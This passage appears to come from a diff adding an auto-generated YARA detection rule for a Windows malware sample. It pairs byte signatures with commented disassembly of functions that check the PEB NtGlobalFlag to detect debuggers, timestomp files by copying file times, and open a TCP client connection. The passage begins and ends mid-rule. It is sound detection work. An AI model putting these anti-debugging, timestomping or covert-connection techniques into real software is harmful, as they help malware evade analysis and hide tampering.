B8 01 00 00 00 EB ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401790@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00401790 + .text:0x00401790 FUNC: int cdecl sub_00401790( int arg0, ) [2 XREFS] + .text:0x00401790 + .text:0x00401790 Stack Variables: (offset from initial top of stack) + .text:0x00401790 4: int arg0 + .text:0x00401790 -1028: int local1028 + .text:0x00401790 -2052: int local2052 + .text:0x00401790 -3076: int local3076 + .text:0x00401790 -4100: int local4100 + .text:0x00401790 -4104: int local4104 + .text:0x00401790 -4108: int local4108 + .text:0x00401790 -4112: int local4112 + .text:0x00401790 + .text:0x00401790 55 push ebp + .text:0x00401791 8bec mov ebp,esp + .text:0x00401793 b80c100000 mov eax,0x0000100c + .text:0x00401798 e8d3210000 call 0x00403970 ;__alloca_probe() + .text:0x0040179d 53 push ebx + .text:0x0040179e 56 push esi + .text:0x0040179f 57 push edi + .text:0x004017a0 c785f8efffff0000 mov dword [ebp - 4104],0 + .text:0x004017aa c785f4efffff0000 mov dword [ebp - 4108],0 + .text:0x004017b4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004017ba 8a5802 mov bl,byte [eax + 2] + .text:0x004017bd 889dfcefffff mov byte [ebp - 4100],bl + .text:0x004017c3 0fbe85fcefffff movsx eax,byte [ebp - 4100] + .text:0x004017ca 85c0 test eax,eax + .text:0x004017cc 7405 jz 0x004017d3 + .text:0x004017ce e82df8ffff call 0x00401000 ;sub_00401000() + .text:0x004017d3 loc_004017d3: [1 XREFS] + .text:0x004017d3 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004017d9 8b4018 mov eax,dword [eax + 24] + .text:0x004017dc 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x004017e0 8985f8efffff mov dword [ebp - 4104],eax + .text:0x004017e6 83bdf8efffff00 cmp dword [ebp - 4104],0 + .text:0x004017ed 7405 jz 0x004017f4 + .text:0x004017ef e80cf8ffff call 0x00401000 ;sub_00401000() + .text:0x004017f4 loc_004017f4: [1 XREFS] + .text:0x004017f4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004017fa 
3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x004017fe 83e870 sub eax,112 + .text:0x00401801 8985f4efffff mov dword [ebp - 4108],eax + .text:0x00401807 83bdf4efffff00 cmp dword [ebp - 4108],0 + .text:0x0040180e 7505 jnz 0x00401815 + .text:0x00401810 e8ebf7ffff call 0x00401000 ;sub_00401000() + .text:0x00401815 loc_00401815: [1 XREFS] + .text:0x00401815 6800040000 push 1024 + .text:0x0040181a 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x00401820 51 push ecx + .text:0x00401821 6800040000 push 1024 + .text:0x00401826 8d9500f0ffff lea edx,dword [ebp - 4096] + .text:0x0040182c 52 push edx + .text:0x0040182d 6800040000 push 1024 + .text:0x00401832 8d8500f8ffff lea eax,dword [ebp - 2048] + .text:0x00401838 50 push eax + .text:0x00401839 6800040000 push 1024 + .text:0x0040183e 8d8d00f4ffff lea ecx,dword [ebp - 3072] + .text:0x00401844 51 push ecx + .text:0x00401845 e866fcffff call 0x004014b0 ;sub_004014b0(local3076,1024,local2052,1024,local4100,1024,local1028) + .text:0x0040184a 83c420 add esp,32 + .text:0x0040184d 85c0 test eax,eax + .text:0x0040184f 7407 jz 0x00401858 + .text:0x00401851 b801000000 mov eax,1 + .text:0x00401856 eb16 jmp 0x0040186e + .text:0x00401858 loc_00401858: [1 XREFS] + .text:0x00401858 8d9500f0ffff lea edx,dword [ebp - 4096] + .text:0x0040185e 52 push edx + .text:0x0040185f e8c6210000 call 0x00403a2a ;_atoi(local4100) + .text:0x00401864 83c404 add esp,4 + .text:0x00401867 8b4d08 mov ecx,dword [ebp + 8] + .text:0x0040186a 8901 mov dword [ecx],eax + .text:0x0040186c 33c0 xor eax,eax + .text:0x0040186e loc_0040186e: [1 XREFS] + .text:0x0040186e 5f pop edi + .text:0x0040186f 5e pop esi + .text:0x00401870 5b pop ebx + .text:0x00401871 8be5 mov esp,ebp + .text:0x00401873 5d pop ebp + .text:0x00401874 c3 ret + */ + $c27 = { 55 8B EC B8 0C 10 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 
3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 68 00 04 00 00 8D 95 ?? ?? ?? ?? 52 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 20 85 C0 74 ?? B8 01 00 00 00 EB ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 8B 4D ?? 89 01 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401880@7faafc7e4a5c736ebfee6abbbc812d80 with 2 features: + - check for PEB NtGlobalFlag flag + - timestomp file + .text:0x00401880 + .text:0x00401880 FUNC: int cdecl sub_00401880( int arg0, int arg1, ) [2 XREFS] + .text:0x00401880 + .text:0x00401880 Stack Variables: (offset from initial top of stack) + .text:0x00401880 8: int arg1 + .text:0x00401880 4: int arg0 + .text:0x00401880 -12: int local12 + .text:0x00401880 -20: int local20 + .text:0x00401880 -28: int local28 + .text:0x00401880 -32: int local32 + .text:0x00401880 -36: int local36 + .text:0x00401880 -40: int local40 + .text:0x00401880 -44: int local44 + .text:0x00401880 + .text:0x00401880 55 push ebp + .text:0x00401881 8bec mov ebp,esp + .text:0x00401883 83ec28 sub esp,40 + .text:0x00401886 53 push ebx + .text:0x00401887 56 push esi + .text:0x00401888 57 push edi + .text:0x00401889 c745dc00000000 mov dword [ebp - 36],0 + .text:0x00401890 c745d800000000 mov dword [ebp - 40],0 + .text:0x00401897 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040189d 8a5802 mov bl,byte [eax + 2] + .text:0x004018a0 885de0 mov byte [ebp - 32],bl + .text:0x004018a3 0fbe45e0 movsx eax,byte [ebp - 32] + .text:0x004018a7 85c0 test eax,eax + .text:0x004018a9 7405 jz 0x004018b0 + .text:0x004018ab e850f7ffff call 0x00401000 ;sub_00401000() + .text:0x004018b0 loc_004018b0: [1 XREFS] + .text:0x004018b0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004018b6 8b4018 mov eax,dword [eax + 24] + .text:0x004018b9 3e8b4010 ds: mov eax,dword [eax + 16] + 
.text:0x004018bd 8945dc mov dword [ebp - 36],eax + .text:0x004018c0 837ddc00 cmp dword [ebp - 36],0 + .text:0x004018c4 7405 jz 0x004018cb + .text:0x004018c6 e835f7ffff call 0x00401000 ;sub_00401000() + .text:0x004018cb loc_004018cb: [1 XREFS] + .text:0x004018cb 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004018d1 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x004018d5 83e870 sub eax,112 + .text:0x004018d8 8945d8 mov dword [ebp - 40],eax + .text:0x004018db 837dd800 cmp dword [ebp - 40],0 + .text:0x004018df 7505 jnz 0x004018e6 + .text:0x004018e1 e81af7ffff call 0x00401000 ;sub_00401000() + .text:0x004018e6 loc_004018e6: [1 XREFS] + .text:0x004018e6 6a00 push 0 + .text:0x004018e8 6880000000 push 128 + .text:0x004018ed 6a03 push 3 + .text:0x004018ef 6a00 push 0 + .text:0x004018f1 6a01 push 1 + .text:0x004018f3 6800000080 push 0x80000000 + .text:0x004018f8 8b4d0c mov ecx,dword [ebp + 12] + .text:0x004018fb 51 push ecx + .text:0x004018fc ff154cb04000 call dword [0x0040b04c] ;kernel32.CreateFileA(arg1,0x80000000,1,0,3,128,0) + .text:0x00401902 8945e4 mov dword [ebp - 28],eax + .text:0x00401905 837de400 cmp dword [ebp - 28],0 + .text:0x00401909 750a jnz 0x00401915 + .text:0x0040190b b801000000 mov eax,1 + .text:0x00401910 e98b000000 jmp 0x004019a0 + .text:0x00401915 loc_00401915: [1 XREFS] + .text:0x00401915 8d55f0 lea edx,dword [ebp - 16] + .text:0x00401918 52 push edx + .text:0x00401919 8d45e8 lea eax,dword [ebp - 24] + .text:0x0040191c 50 push eax + .text:0x0040191d 8d4df8 lea ecx,dword [ebp - 8] + .text:0x00401920 51 push ecx + .text:0x00401921 8b55e4 mov edx,dword [ebp - 28] + .text:0x00401924 52 push edx + .text:0x00401925 ff1550b04000 call dword [0x0040b050] ;kernel32.GetFileTime(kernel32.CreateFileA(arg1,0x80000000,1,0,3,128,0),local12,local28,local20) + .text:0x0040192b 85c0 test eax,eax + .text:0x0040192d 7511 jnz 0x00401940 + .text:0x0040192f 8b45e4 mov eax,dword [ebp - 28] + .text:0x00401932 50 push eax + .text:0x00401933 ff1558b04000 call dword 
[0x0040b058] ;kernel32.CloseHandle(<0x004018fc>) + .text:0x00401939 b801000000 mov eax,1 + .text:0x0040193e eb60 jmp 0x004019a0 + .text:0x00401940 loc_00401940: [1 XREFS] + .text:0x00401940 8b4de4 mov ecx,dword [ebp - 28] + .text:0x00401943 51 push ecx + .text:0x00401944 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(<0x004018fc>) + .text:0x0040194a 6a00 push 0 + .text:0x0040194c 6880000000 push 128 + .text:0x00401951 6a03 push 3 + .text:0x00401953 6a00 push 0 + .text:0x00401955 6a02 push 2 + .text:0x00401957 6800000040 push 0x40000000 + .text:0x0040195c 8b5508 mov edx,dword [ebp + 8] + .text:0x0040195f 52 push edx + .text:0x00401960 ff154cb04000 call dword [0x0040b04c] ;kernel32.CreateFileA(arg0,0x40000000,2,0,3,128,0) + .text:0x00401966 8945e4 mov dword [ebp - 28],eax + .text:0x00401969 8d45f0 lea eax,dword [ebp - 16] + .text:0x0040196c 50 push eax + .text:0x0040196d 8d4de8 lea ecx,dword [ebp - 24] + .text:0x00401970 51 push ecx + .text:0x00401971 8d55f8 lea edx,dword [ebp - 8] + .text:0x00401974 52 push edx + .text:0x00401975 8b45e4 mov eax,dword [ebp - 28] + .text:0x00401978 50 push eax + .text:0x00401979 ff1554b04000 call dword [0x0040b054] ;kernel32.SetFileTime(kernel32.CreateFileA(arg0,0x40000000,2,0,3,128,0),local12,local28,local20) + .text:0x0040197f 85c0 test eax,eax + .text:0x00401981 7511 jnz 0x00401994 + .text:0x00401983 8b4de4 mov ecx,dword [ebp - 28] + .text:0x00401986 51 push ecx + .text:0x00401987 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(<0x00401960>) + .text:0x0040198d b801000000 mov eax,1 + .text:0x00401992 eb0c jmp 0x004019a0 + .text:0x00401994 loc_00401994: [1 XREFS] + .text:0x00401994 8b55e4 mov edx,dword [ebp - 28] + .text:0x00401997 52 push edx + .text:0x00401998 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(<0x00401960>) + .text:0x0040199e 33c0 xor eax,eax + .text:0x004019a0 loc_004019a0: [3 XREFS] + .text:0x004019a0 5f pop edi + .text:0x004019a1 5e pop esi + .text:0x004019a2 5b pop ebx + 
.text:0x004019a3 8be5 mov esp,ebp + .text:0x004019a5 5d pop ebp + .text:0x004019a6 c3 ret + */ + $c28 = { 55 8B EC 83 EC 28 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 45 ?? 83 7D ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 45 ?? 83 7D ?? 00 75 ?? E8 ?? ?? ?? ?? 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 6A 00 68 80 00 00 00 6A 03 6A 00 6A 02 68 00 00 00 40 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004019b0@7faafc7e4a5c736ebfee6abbbc812d80 with 2 features: + - check for PEB NtGlobalFlag flag + - get common file path + .text:0x004019b0 + .text:0x004019b0 FUNC: int cdecl sub_004019b0( int arg0, ) [4 XREFS] + .text:0x004019b0 + .text:0x004019b0 Stack Variables: (offset from initial top of stack) + .text:0x004019b0 4: int arg0 + .text:0x004019b0 -1028: int local1028 + .text:0x004019b0 -1032: int local1032 + .text:0x004019b0 -1036: int local1036 + .text:0x004019b0 -1040: int local1040 + .text:0x004019b0 + .text:0x004019b0 55 push ebp + .text:0x004019b1 8bec mov ebp,esp + .text:0x004019b3 81ec0c040000 sub esp,1036 + .text:0x004019b9 53 push ebx + .text:0x004019ba 56 push esi + .text:0x004019bb 57 push edi + .text:0x004019bc c785f8fbffff0000 mov dword [ebp - 1032],0 + .text:0x004019c6 c785f4fbffff0000 mov dword [ebp - 1036],0 + .text:0x004019d0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004019d6 8a5802 mov bl,byte [eax + 2] + .text:0x004019d9 889dfcfbffff mov 
byte [ebp - 1028],bl + .text:0x004019df 0fbe85fcfbffff movsx eax,byte [ebp - 1028] + .text:0x004019e6 85c0 test eax,eax + .text:0x004019e8 7405 jz 0x004019ef + .text:0x004019ea e811f6ffff call 0x00401000 ;sub_00401000() + .text:0x004019ef loc_004019ef: [1 XREFS] + .text:0x004019ef 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004019f5 8b4018 mov eax,dword [eax + 24] + .text:0x004019f8 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x004019fc 8985f8fbffff mov dword [ebp - 1032],eax + .text:0x00401a02 83bdf8fbffff00 cmp dword [ebp - 1032],0 + .text:0x00401a09 7405 jz 0x00401a10 + .text:0x00401a0b e8f0f5ffff call 0x00401000 ;sub_00401000() + .text:0x00401a10 loc_00401a10: [1 XREFS] + .text:0x00401a10 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401a16 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00401a1a 83e870 sub eax,112 + .text:0x00401a1d 8985f4fbffff mov dword [ebp - 1036],eax + .text:0x00401a23 83bdf4fbffff00 cmp dword [ebp - 1036],0 + .text:0x00401a2a 7505 jnz 0x00401a31 + .text:0x00401a2c e8cff5ffff call 0x00401000 ;sub_00401000() + .text:0x00401a31 loc_00401a31: [1 XREFS] + .text:0x00401a31 6800040000 push 1024 + .text:0x00401a36 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x00401a3c 51 push ecx + .text:0x00401a3d ff1548b04000 call dword [0x0040b048] ;kernel32.GetSystemDirectoryA(local1028,1024) + .text:0x00401a43 85c0 test eax,eax + .text:0x00401a45 7507 jnz 0x00401a4e + .text:0x00401a47 b801000000 mov eax,1 + .text:0x00401a4c eb54 jmp 0x00401aa2 + .text:0x00401a4e loc_00401a4e: [1 XREFS] + .text:0x00401a4e bf70c04000 mov edi,0x0040c070 + .text:0x00401a53 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00401a59 83c9ff or ecx,0xffffffff + .text:0x00401a5c 33c0 xor eax,eax + .text:0x00401a5e f2ae repnz: scasb + .text:0x00401a60 f7d1 not ecx + .text:0x00401a62 2bf9 sub edi,ecx + .text:0x00401a64 8bf7 mov esi,edi + .text:0x00401a66 8bd9 mov ebx,ecx + .text:0x00401a68 8bfa mov edi,edx + .text:0x00401a6a 83c9ff or ecx,0xffffffff + 
.text:0x00401a6d 33c0 xor eax,eax + .text:0x00401a6f f2ae repnz: scasb + .text:0x00401a71 83c7ff add edi,0xffffffff + .text:0x00401a74 8bcb mov ecx,ebx + .text:0x00401a76 c1e902 shr ecx,2 + .text:0x00401a79 f3a5 rep: movsd + .text:0x00401a7b 8bcb mov ecx,ebx + .text:0x00401a7d 83e103 and ecx,3 + .text:0x00401a80 f3a4 rep: movsb + .text:0x00401a82 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x00401a88 50 push eax + .text:0x00401a89 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401a8c 51 push ecx + .text:0x00401a8d e8eefdffff call 0x00401880 ;sub_00401880(arg0,local1028) + .text:0x00401a92 83c408 add esp,8 + .text:0x00401a95 85c0 test eax,eax + .text:0x00401a97 7407 jz 0x00401aa0 + .text:0x00401a99 b801000000 mov eax,1 + .text:0x00401a9e eb02 jmp 0x00401aa2 + .text:0x00401aa0 loc_00401aa0: [1 XREFS] + .text:0x00401aa0 33c0 xor eax,eax + .text:0x00401aa2 loc_00401aa2: [2 XREFS] + .text:0x00401aa2 5f pop edi + .text:0x00401aa3 5e pop esi + .text:0x00401aa4 5b pop ebx + .text:0x00401aa5 8be5 mov esp,ebp + .text:0x00401aa7 5d pop ebp + .text:0x00401aa8 c3 ret + */ + $c29 = { 55 8B EC 81 EC 0C 04 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? BF 70 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 EB ?? 
33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401ab0@7faafc7e4a5c736ebfee6abbbc812d80 with 5 features: + - act as TCP client + - check for PEB NtGlobalFlag flag + - connect TCP socket + - initialize Winsock library + - resolve DNS + .text:0x00401ab0 + .text:0x00401ab0 FUNC: int cdecl sub_00401ab0( int arg0, int arg1, int arg2, ) [8 XREFS] + .text:0x00401ab0 + .text:0x00401ab0 Stack Variables: (offset from initial top of stack) + .text:0x00401ab0 12: int arg2 + .text:0x00401ab0 8: int arg1 + .text:0x00401ab0 4: int arg0 + .text:0x00401ab0 -404: int local404 + .text:0x00401ab0 -408: int local408 + .text:0x00401ab0 -420: int local420 + .text:0x00401ab0 -422: int local422 + .text:0x00401ab0 -424: int local424 + .text:0x00401ab0 -428: int local428 + .text:0x00401ab0 -432: int local432 + .text:0x00401ab0 -436: int local436 + .text:0x00401ab0 + .text:0x00401ab0 55 push ebp + .text:0x00401ab1 8bec mov ebp,esp + .text:0x00401ab3 81ecb0010000 sub esp,432 + .text:0x00401ab9 53 push ebx + .text:0x00401aba 56 push esi + .text:0x00401abb 57 push edi + .text:0x00401abc c78554feffff0000 mov dword [ebp - 428],0 + .text:0x00401ac6 c78550feffff0000 mov dword [ebp - 432],0 + .text:0x00401ad0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401ad6 8a5802 mov bl,byte [eax + 2] + .text:0x00401ad9 889d58feffff mov byte [ebp - 424],bl + .text:0x00401adf 0fbe8558feffff movsx eax,byte [ebp - 424] + .text:0x00401ae6 85c0 test eax,eax + .text:0x00401ae8 7405 jz 0x00401aef + .text:0x00401aea e811f5ffff call 0x00401000 ;sub_00401000() + .text:0x00401aef loc_00401aef: [1 XREFS] + .text:0x00401aef 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401af5 8b4018 mov eax,dword [eax + 24] + .text:0x00401af8 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00401afc 898554feffff mov dword [ebp - 428],eax + .text:0x00401b02 83bd54feffff00 cmp dword [ebp - 428],0 + .text:0x00401b09 7405 jz 0x00401b10 + .text:0x00401b0b e8f0f4ffff call 0x00401000 ;sub_00401000() + .text:0x00401b10 
loc_00401b10: [1 XREFS] + .text:0x00401b10 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401b16 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00401b1a 83e870 sub eax,112 + .text:0x00401b1d 898550feffff mov dword [ebp - 432],eax + .text:0x00401b23 83bd50feffff00 cmp dword [ebp - 432],0 + .text:0x00401b2a 7505 jnz 0x00401b31 + .text:0x00401b2c e8cff4ffff call 0x00401000 ;sub_00401000() + .text:0x00401b31 loc_00401b31: [1 XREFS] + .text:0x00401b31 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401b34 c701ffffffff mov dword [ecx],0xffffffff + .text:0x00401b3a 8d9570feffff lea edx,dword [ebp - 400] + .text:0x00401b40 52 push edx + .text:0x00401b41 6802020000 push 514 + .text:0x00401b46 ff1544b14000 call dword [0x0040b144] ;ws2_32.WSAStartup(514,local404) + .text:0x00401b4c 85c0 test eax,eax + .text:0x00401b4e 740a jz 0x00401b5a + .text:0x00401b50 b801000000 mov eax,1 + .text:0x00401b55 e9bb000000 jmp 0x00401c15 + .text:0x00401b5a loc_00401b5a: [1 XREFS] + .text:0x00401b5a 8b450c mov eax,dword [ebp + 12] + .text:0x00401b5d 50 push eax + .text:0x00401b5e ff1548b14000 call dword [0x0040b148] ;ws2_32.gethostbyname(arg1) + .text:0x00401b64 89856cfeffff mov dword [ebp - 404],eax + .text:0x00401b6a 83bd6cfeffff00 cmp dword [ebp - 404],0 + .text:0x00401b71 7510 jnz 0x00401b83 + .text:0x00401b73 ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x00401b79 b801000000 mov eax,1 + .text:0x00401b7e e992000000 jmp 0x00401c15 + .text:0x00401b83 loc_00401b83: [1 XREFS] + .text:0x00401b83 6a06 push 6 + .text:0x00401b85 6a01 push 1 + .text:0x00401b87 6a02 push 2 + .text:0x00401b89 ff1550b14000 call dword [0x0040b150] ;ws2_32.socket(2,1,6) + .text:0x00401b8f 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401b92 8901 mov dword [ecx],eax + .text:0x00401b94 8b5508 mov edx,dword [ebp + 8] + .text:0x00401b97 833aff cmp dword [edx],0xffffffff + .text:0x00401b9a 750d jnz 0x00401ba9 + .text:0x00401b9c ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + 
.text:0x00401ba2 b801000000 mov eax,1 + .text:0x00401ba7 eb6c jmp 0x00401c15 + .text:0x00401ba9 loc_00401ba9: [1 XREFS] + .text:0x00401ba9 66c7855cfeffff02 mov word [ebp - 420],2 + .text:0x00401bb2 8b856cfeffff mov eax,dword [ebp - 404] + .text:0x00401bb8 8b480c mov ecx,dword [eax + 12] + .text:0x00401bbb 8b11 mov edx,dword [ecx] + .text:0x00401bbd 8b02 mov eax,dword [edx] + .text:0x00401bbf 898560feffff mov dword [ebp - 416],eax + .text:0x00401bc5 668b4d10 mov cx,word [ebp + 16] + .text:0x00401bc9 51 push ecx + .text:0x00401bca ff1554b14000 call dword [0x0040b154] ;ws2_32.htons(0x6161500f) + .text:0x00401bd0 6689855efeffff mov word [ebp - 418],ax + .text:0x00401bd7 6a10 push 16 + .text:0x00401bd9 8d955cfeffff lea edx,dword [ebp - 420] + .text:0x00401bdf 52 push edx + .text:0x00401be0 8b4508 mov eax,dword [ebp + 8] + .text:0x00401be3 8b08 mov ecx,dword [eax] + .text:0x00401be5 51 push ecx + .text:0x00401be6 ff1558b14000 call dword [0x0040b158] ;ws2_32.connect(0x61616161,local424,16) + .text:0x00401bec 83f8ff cmp eax,0xffffffff + .text:0x00401bef 7522 jnz 0x00401c13 + .text:0x00401bf1 8b5508 mov edx,dword [ebp + 8] + .text:0x00401bf4 8b02 mov eax,dword [edx] + .text:0x00401bf6 50 push eax + .text:0x00401bf7 ff155cb14000 call dword [0x0040b15c] ;ws2_32.closesocket(0x61616161) + .text:0x00401bfd 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401c00 c701ffffffff mov dword [ecx],0xffffffff + .text:0x00401c06 ff1564b14000 call dword [0x0040b164] ;ws2_32.WSACleanup() + .text:0x00401c0c b801000000 mov eax,1 + .text:0x00401c11 eb02 jmp 0x00401c15 + .text:0x00401c13 loc_00401c13: [1 XREFS] + .text:0x00401c13 33c0 xor eax,eax + .text:0x00401c15 loc_00401c15: [4 XREFS] + .text:0x00401c15 5f pop edi + .text:0x00401c16 5e pop esi + .text:0x00401c17 5b pop ebx + .text:0x00401c18 8be5 mov esp,ebp + .text:0x00401c1a 5d pop ebp + .text:0x00401c1b c3 ret + */ + $c30 = { 55 8B EC 81 EC B0 01 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 
8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? C7 01 FF FF FF FF 8D 95 ?? ?? ?? ?? 52 68 02 02 00 00 FF 15 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 06 6A 01 6A 02 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 55 ?? 83 3A FF 75 ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 66 C7 85 ?? ?? ?? ?? 02 00 8B 85 ?? ?? ?? ?? 8B 48 ?? 8B 11 8B 02 89 85 ?? ?? ?? ?? 66 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 6A 10 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 8B 08 51 FF 15 ?? ?? ?? ?? 83 F8 FF 75 ?? 8B 55 ?? 8B 02 50 FF 15 ?? ?? ?? ?? 8B 4D ?? C7 01 FF FF FF FF FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401c20@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00401c20 + .text:0x00401c20 FUNC: int cdecl sub_00401c20( int arg0, ) [24 XREFS] + .text:0x00401c20 + .text:0x00401c20 Stack Variables: (offset from initial top of stack) + .text:0x00401c20 4: int arg0 + .text:0x00401c20 -8: int local8 + .text:0x00401c20 -12: int local12 + .text:0x00401c20 -16: int local16 + .text:0x00401c20 + .text:0x00401c20 55 push ebp + .text:0x00401c21 8bec mov ebp,esp + .text:0x00401c23 83ec0c sub esp,12 + .text:0x00401c26 53 push ebx + .text:0x00401c27 56 push esi + .text:0x00401c28 57 push edi + .text:0x00401c29 c745f800000000 mov dword [ebp - 8],0 + .text:0x00401c30 c745f400000000 mov dword [ebp - 12],0 + .text:0x00401c37 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401c3d 8a5802 mov bl,byte [eax + 2] + .text:0x00401c40 885dfc mov byte [ebp - 4],bl + .text:0x00401c43 0fbe45fc movsx eax,byte [ebp - 4] + .text:0x00401c47 85c0 test eax,eax + 
